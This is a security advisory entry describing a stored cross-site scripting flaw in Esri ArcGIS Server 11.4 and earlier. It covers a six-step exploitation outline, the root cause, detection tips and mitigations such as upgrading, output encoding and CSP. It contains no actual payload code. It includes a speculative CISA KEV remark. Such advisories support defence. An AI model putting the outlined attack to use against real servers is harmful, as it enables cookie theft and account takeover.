Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to a stored cross-site scripting (XSS) attack, allowing unauthenticated attackers to inject malicious code. This vulnerability enables attackers to compromise user browsers, potentially leading to account takeover and data exfiltration. Successful exploitation requires specific server configurations on both Windows and Linux platforms.
Step 1: Payload Delivery: The attacker identifies a vulnerable endpoint within ArcGIS Server that allows for file uploads or data storage, such as a feature service or a web map configuration. Step 2: Payload Creation: The attacker crafts a malicious file (e.g., an HTML file, a JavaScript file, or a file containing JavaScript within a supported format) containing a cross-site scripting (XSS) payload. This payload typically includes JavaScript code designed to execute within the victim's browser. Step 3: Payload Injection: The attacker uploads or stores the malicious file on the ArcGIS Server. The server, due to the vulnerability, does not properly sanitize or encode the contents of the file. Step 4: Victim Interaction: A legitimate user accesses a resource that references or displays the attacker's uploaded file. This could be through a map, a service, or a direct link to the file. Step 5: Payload Execution: The victim's browser renders the content of the attacker's file, including the malicious JavaScript payload. Step 6: Attack Execution: The injected JavaScript executes within the victim's browser, allowing the attacker to perform actions such as stealing cookies, redirecting the user, or modifying the content of the web application.
The vulnerability stems from insufficient input validation and output encoding within Esri ArcGIS Server. Specifically, the server fails to properly sanitize user-supplied data before storing it and subsequently rendering it within the context of a user's browser. This allows an attacker to inject malicious JavaScript code into a file, which is then stored on the server. When a legitimate user accesses the vulnerable resource, the injected JavaScript executes within their browser, enabling the attacker to perform actions on behalf of the user, such as stealing cookies, redirecting to phishing sites, or modifying the content of the web application. The root cause is a lack of proper input validation and output encoding when handling user-supplied data, specifically related to file uploads or data storage mechanisms within the ArcGIS Server application. This allows for the injection of malicious code that is then executed in the context of a user's browser.
Likely targets organizations using Esri ArcGIS Server, including government agencies, utilities, and businesses that rely on geospatial data. The vulnerability could be exploited by a wide range of threat actors, from opportunistic attackers to more sophisticated groups. No specific APTs are definitively linked at this time, but the nature of the vulnerability makes it attractive to various actors. CISA KEV status: Likely to be added soon.
Monitor web server logs for suspicious file uploads, especially those with unusual extensions or content.
Analyze network traffic for unusual HTTP requests related to ArcGIS Server, particularly those involving file uploads or data retrieval.
Implement a Web Application Firewall (WAF) to detect and block XSS attempts.
Monitor for changes in ArcGIS Server configuration files or data directories.
Examine server-side logs for evidence of XSS attacks, such as unusual JavaScript execution or cookie manipulation.
Upgrade to Esri ArcGIS Server 11.5 or later, which includes a patch for this vulnerability.
Implement robust input validation to sanitize all user-supplied data before storing it.
Implement output encoding to properly encode all data before rendering it in the browser.
Configure a Web Application Firewall (WAF) to filter malicious requests.
Regularly scan the ArcGIS Server for vulnerabilities using a vulnerability scanner.
Review and restrict access to sensitive data and resources within ArcGIS Server.
Implement a Content Security Policy (CSP) to mitigate the impact of XSS attacks.